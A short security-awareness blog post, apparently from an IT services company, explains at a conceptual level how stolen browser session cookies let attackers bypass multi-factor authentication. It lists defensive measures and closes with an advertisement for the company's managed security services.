Although The Multi-Factor Authentication process reduces the attack surface by preventing criminals with stolen user credentials from logging on, it is possible to steal cookies from current or recent web sessions to bypass multi-factor authentication (MFA).

How is it Possible?

Browser cookies enable web applications to store user authentication information, so a user can stay signed in instead of having to supply their username and password every time they navigate to a new page on a website. Although this is a convenient way for users to continue their web session over long periods of time, it sacrifices security to make that convenience possible.

Attackers can exploit this functionality to steal credentials and skip the login challenge.
Behind the scenes, browsers use SQLite database files that contain cookies. These cookies are composed of key-value pairs, and the values often contain critical information such as tokens and expiration dates.

If MFA is enabled, the user has to provide additional proof of their identity, such as by accepting a push notification on their mobile device. Once the user has passed MFA, a browser cookie is created and stored for your web session. Therefore, the vulnerability is obvious: If somebody were able to extract the right browser cookies, they could authenticate as another user in a totally separate web browser session on another system. In short, they could use the cookie to bypass authentication via MFA.

The attack can be scripted since attackers know the exact name and location of the SQLite database files for all major browsers such as Chrome, Firefox, and other browsers on various operating systems. It’s not uncommon to find such scripts along with other modules in info-stealing and other malware. To gain initial access, attackers can also perform phishing and spear-phishing campaigns to implant droppers that can deploy cookie-stealer malware without the end-users knowledge.

How Can You Protect Your System from Such Attacks

Pass-the-Cookie attacks are a serious threat for a few reasons.

  • A Pass-the-Cookie attack does not require administrative rights; all users have access to read and decrypt their own browser cookies, regardless of whether they have privileged rights on their workstations.
  • The attacker doesn’t have to know the compromised account’s user ID or password, so this attack is possible with minimal information.
  • It is possible to complete Pass-the Cookie attacks after the browser had been closed.

Steps You Can Take

There are a few ways of minimizing your overall risk:

  • Users should not use built-in features to save passwords unless the browser encrypts them with, at least, a master password.
  • It’s recommended that users uncheck the setting called “remember passwords,” or "remember me" and users should probably not allow persistent sessions as well.
  • You can also delete all cookies automatically when you close the browser.
  • Implement authentication monitoring and threat detection products.
  • Use a hardened web browser.
  • Use a (preferrably offline) password manager
  • Be careful of the links you click

Most people deploying and using MFA are inclined to think of it as like a fix-all to stop them being hacked, which is simply untrue. Thinking that MFA makes you un-hackable is even more dangerous than not using MFA.

One of the best way’s to stay on top of your IT Security is to partner with a known Cybersecurity expert that can help manage your overall IT infrastructure and help you see all possible threat vectors.  Partnering with an expert like Natural Networks can help keep your IT defenses up, so you can focus on what’s important in your work.  If you’re interested in learning more about how Natural Networks can help you achieve IT peace of mind, give us a call today!